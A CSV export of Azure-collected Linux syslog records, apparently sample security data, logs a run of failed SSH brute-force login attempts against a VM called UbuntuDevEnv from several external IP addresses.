+17206,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:47:36,UbuntuDevEnv,2019-06-26 08:47:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=183.47.14.74,61473,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,183.47.14.7,,0,
+17207,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:47:38,UbuntuDevEnv,2019-06-26 08:47:37,auth,UbuntuDevEnv,info,Failed password for invalid user gmmisdt from 183.47.14.74 port 38487 ssh2,61473,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gmmisdt,183.47.14.7,38487,,
+17208,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:47:38,UbuntuDevEnv,2019-06-26 08:47:38,auth,UbuntuDevEnv,info,Disconnected from invalid user gmmisdt 183.47.14.74 port 38487 [preauth],61473,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gmmisdt,183.47.14.7,38487,,
+17209,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:47:38,UbuntuDevEnv,2019-06-26 08:47:38,auth,UbuntuDevEnv,info,Received disconnect from 183.47.14.74 port 38487:11: Bye Bye [preauth],61473,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,183.47.14.7,38487,,
+17210,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:49:01,UbuntuDevEnv,2019-06-26 08:49:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,61763,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17211,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:49:01,UbuntuDevEnv,2019-06-26 08:49:01,auth,UbuntuDevEnv,info,Invalid user tftpd from 185.103.243.78 port 34430,61763,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tftpd,185.103.243.7,34430,,
+17212,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:49:01,UbuntuDevEnv,2019-06-26 08:49:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=185.103.243.78,61763,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,185.103.243.7,,0,
+17213,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:49:03,UbuntuDevEnv,2019-06-26 08:49:02,auth,UbuntuDevEnv,info,Failed password for invalid user tftpd from 185.103.243.78 port 34430 ssh2,61763,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tftpd,185.103.243.7,34430,,
+17214,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:49:03,UbuntuDevEnv,2019-06-26 08:49:02,auth,UbuntuDevEnv,info,Received disconnect from 185.103.243.78 port 34430:11: Bye Bye [preauth],61763,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.103.243.7,34430,,
+17215,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:49:03,UbuntuDevEnv,2019-06-26 08:49:02,auth,UbuntuDevEnv,info,Disconnected from invalid user tftpd 185.103.243.78 port 34430 [preauth],61763,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tftpd,185.103.243.7,34430,,
+17216,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:49:04,UbuntuDevEnv,2019-06-26 08:49:04,auth,UbuntuDevEnv,info,Invalid user jason from 143.0.52.117 port 55661,61780,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jason,143.0.52.1,55661,,
+17217,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:49:04,UbuntuDevEnv,2019-06-26 08:49:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=143.0.52.117,61780,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,143.0.52.1,,0,
+17218,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:49:04,UbuntuDevEnv,2019-06-26 08:49:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,61780,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17219,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:49:06,UbuntuDevEnv,2019-06-26 08:49:05,auth,UbuntuDevEnv,info,Invalid user claudio from 45.55.190.46 port 54354,61712,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,claudio,45.55.190.4,54354,,
+17220,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:49:06,UbuntuDevEnv,2019-06-26 08:49:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.55.190.46,61712,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.55.190.4,,0,
+17221,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:49:06,UbuntuDevEnv,2019-06-26 08:49:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,61712,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17222,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:49:06,UbuntuDevEnv,2019-06-26 08:49:05,auth,UbuntuDevEnv,info,Failed password for invalid user jason from 143.0.52.117 port 55661 ssh2,61780,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jason,143.0.52.1,55661,,
+17223,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:49:06,UbuntuDevEnv,2019-06-26 08:49:06,auth,UbuntuDevEnv,info,Received disconnect from 143.0.52.117 port 55661:11: Bye Bye [preauth],61780,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,143.0.52.1,55661,,
+17224,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:49:06,UbuntuDevEnv,2019-06-26 08:49:06,auth,UbuntuDevEnv,info,Disconnected from invalid user jason 143.0.52.117 port 55661 [preauth],61780,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jason,143.0.52.1,55661,,
+17225,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:49:09,UbuntuDevEnv,2019-06-26 08:49:08,auth,UbuntuDevEnv,info,Failed password for invalid user claudio from 45.55.190.46 port 54354 ssh2,61712,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,claudio,45.55.190.4,54354,,
+17226,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:49:10,UbuntuDevEnv,2019-06-26 08:49:10,auth,UbuntuDevEnv,info,Disconnected from invalid user claudio 45.55.190.46 port 54354 [preauth],61712,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,claudio,45.55.190.4,54354,,
+17227,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:49:10,UbuntuDevEnv,2019-06-26 08:49:10,auth,UbuntuDevEnv,info,Received disconnect from 45.55.190.46 port 54354:11: Bye Bye [preauth],61712,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.55.190.4,54354,,
+17228,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:49:42,UbuntuDevEnv,2019-06-26 08:49:42,auth,UbuntuDevEnv,info,Did not receive identification string from 183.47.14.74 port 46437,61906,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,183.47.14.7,46437,,
+17229,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:50:47,UbuntuDevEnv,2019-06-26 08:50:46,auth,UbuntuDevEnv,info,Invalid user minecraft from 185.103.243.78 port 50032,62227,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,minecraft,185.103.243.7,50032,,
+17230,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:50:47,UbuntuDevEnv,2019-06-26 08:50:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=185.103.243.78,62227,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,185.103.243.7,,0,
+17231,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:50:47,UbuntuDevEnv,2019-06-26 08:50:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,62227,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17232,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:50:50,UbuntuDevEnv,2019-06-26 08:50:49,auth,UbuntuDevEnv,info,Failed password for invalid user minecraft from 185.103.243.78 port 50032 ssh2,62227,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,minecraft,185.103.243.7,50032,,
+17233,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:50:50,UbuntuDevEnv,2019-06-26 08:50:49,auth,UbuntuDevEnv,info,Disconnected from invalid user minecraft 185.103.243.78 port 50032 [preauth],62227,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,minecraft,185.103.243.7,50032,,
+17234,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:50:50,UbuntuDevEnv,2019-06-26 08:50:49,auth,UbuntuDevEnv,info,Received disconnect from 185.103.243.78 port 50032:11: Bye Bye [preauth],62227,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.103.243.7,50032,,
+17235,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:50:54,UbuntuDevEnv,2019-06-26 08:50:53,auth,UbuntuDevEnv,info,Invalid user luc from 143.0.52.117 port 35972,62255,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,luc,143.0.52.1,35972,,
+17236,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:50:54,UbuntuDevEnv,2019-06-26 08:50:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=143.0.52.117,62255,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,143.0.52.1,,0,
+17237,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:50:54,UbuntuDevEnv,2019-06-26 08:50:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,62255,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17238,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:50:56,UbuntuDevEnv,2019-06-26 08:50:56,auth,UbuntuDevEnv,info,Failed password for invalid user luc from 143.0.52.117 port 35972 ssh2,62255,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,luc,143.0.52.1,35972,,
+17239,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:50:56,UbuntuDevEnv,2019-06-26 08:50:56,auth,UbuntuDevEnv,info,Disconnected from invalid user luc 143.0.52.117 port 35972 [preauth],62255,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,luc,143.0.52.1,35972,,
+17240,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:50:56,UbuntuDevEnv,2019-06-26 08:50:56,auth,UbuntuDevEnv,info,Received disconnect from 143.0.52.117 port 35972:11: Bye Bye [preauth],62255,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,143.0.52.1,35972,,
+17241,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:51:39,UbuntuDevEnv,2019-06-26 08:51:39,auth,UbuntuDevEnv,info,Invalid user vvv from 183.47.14.74 port 54387,62403,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vvv,183.47.14.7,54387,,
+17242,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:51:39,UbuntuDevEnv,2019-06-26 08:51:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=183.47.14.74,62403,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,183.47.14.7,,0,
+17243,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:51:39,UbuntuDevEnv,2019-06-26 08:51:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,62403,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17244,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:51:41,UbuntuDevEnv,2019-06-26 08:51:40,auth,UbuntuDevEnv,info,Failed password for invalid user vvv from 183.47.14.74 port 54387 ssh2,62403,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vvv,183.47.14.7,54387,,
+17245,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:51:42,UbuntuDevEnv,2019-06-26 08:51:42,auth,UbuntuDevEnv,info,Disconnected from invalid user vvv 183.47.14.74 port 54387 [preauth],62403,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vvv,183.47.14.7,54387,,
+17246,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:51:42,UbuntuDevEnv,2019-06-26 08:51:42,auth,UbuntuDevEnv,info,Received disconnect from 183.47.14.74 port 54387:11: Bye Bye [preauth],62403,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,183.47.14.7,54387,,
+17247,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:52:30,UbuntuDevEnv,2019-06-26 08:52:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=185.103.243.78  user=proxy,62595,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,proxy,185.103.243.7,,0,
+17248,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:52:31,UbuntuDevEnv,2019-06-26 08:52:31,auth,UbuntuDevEnv,info,Failed password for proxy from 185.103.243.78 port 37402 ssh2,62595,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.103.243.7,37402,,
+17249,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:52:31,UbuntuDevEnv,2019-06-26 08:52:31,auth,UbuntuDevEnv,info,Disconnected from authenticating user proxy 185.103.243.78 port 37402 [preauth],62595,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,proxy,185.103.243.7,37402,,
+17250,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:52:31,UbuntuDevEnv,2019-06-26 08:52:31,auth,UbuntuDevEnv,info,Received disconnect from 185.103.243.78 port 37402:11: Bye Bye [preauth],62595,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.103.243.7,37402,,
+17251,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:52:45,UbuntuDevEnv,2019-06-26 08:52:44,auth,UbuntuDevEnv,info,Invalid user jackbj from 143.0.52.117 port 44513,62651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jackbj,143.0.52.1,44513,,
+17252,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:52:45,UbuntuDevEnv,2019-06-26 08:52:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=143.0.52.117,62651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,143.0.52.1,,0,
+17253,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:52:45,UbuntuDevEnv,2019-06-26 08:52:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,62651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17254,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:52:47,UbuntuDevEnv,2019-06-26 08:52:46,auth,UbuntuDevEnv,info,Failed password for invalid user jackbj from 143.0.52.117 port 44513 ssh2,62651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jackbj,143.0.52.1,44513,,
+17255,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:52:47,UbuntuDevEnv,2019-06-26 08:52:47,auth,UbuntuDevEnv,info,Received disconnect from 143.0.52.117 port 44513:11: Bye Bye [preauth],62651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,143.0.52.1,44513,,
+17256,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:52:47,UbuntuDevEnv,2019-06-26 08:52:47,auth,UbuntuDevEnv,info,Disconnected from invalid user jackbj 143.0.52.117 port 44513 [preauth],62651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jackbj,143.0.52.1,44513,,
+17257,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:53:33,UbuntuDevEnv,2019-06-26 08:53:32,auth,UbuntuDevEnv,info,Connection closed by 183.47.14.74 port 34104 [preauth],62803,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,183.47.14.7,34104,,
+17258,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:54:15,UbuntuDevEnv,2019-06-26 08:54:15,auth,UbuntuDevEnv,info,Invalid user silver from 185.103.243.78 port 53004,62964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,silver,185.103.243.7,53004,,
+17259,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:54:15,UbuntuDevEnv,2019-06-26 08:54:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=185.103.243.78,62964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,185.103.243.7,,0,
+17260,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:54:15,UbuntuDevEnv,2019-06-26 08:54:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,62964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17261,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:54:17,UbuntuDevEnv,2019-06-26 08:54:17,auth,UbuntuDevEnv,info,Failed password for invalid user silver from 185.103.243.78 port 53004 ssh2,62964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,silver,185.103.243.7,53004,,
+17262,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:54:17,UbuntuDevEnv,2019-06-26 08:54:17,auth,UbuntuDevEnv,info,Disconnected from invalid user silver 185.103.243.78 port 53004 [preauth],62964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,silver,185.103.243.7,53004,,
+17263,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:54:17,UbuntuDevEnv,2019-06-26 08:54:17,auth,UbuntuDevEnv,info,Received disconnect from 185.103.243.78 port 53004:11: Bye Bye [preauth],62964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.103.243.7,53004,,
+17264,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:54:33,UbuntuDevEnv,2019-06-26 08:54:32,auth,UbuntuDevEnv,info,Invalid user gtasa from 143.0.52.117 port 53055,63031,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gtasa,143.0.52.1,53055,,
+17265,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:54:33,UbuntuDevEnv,2019-06-26 08:54:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=143.0.52.117,63031,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,143.0.52.1,,0,
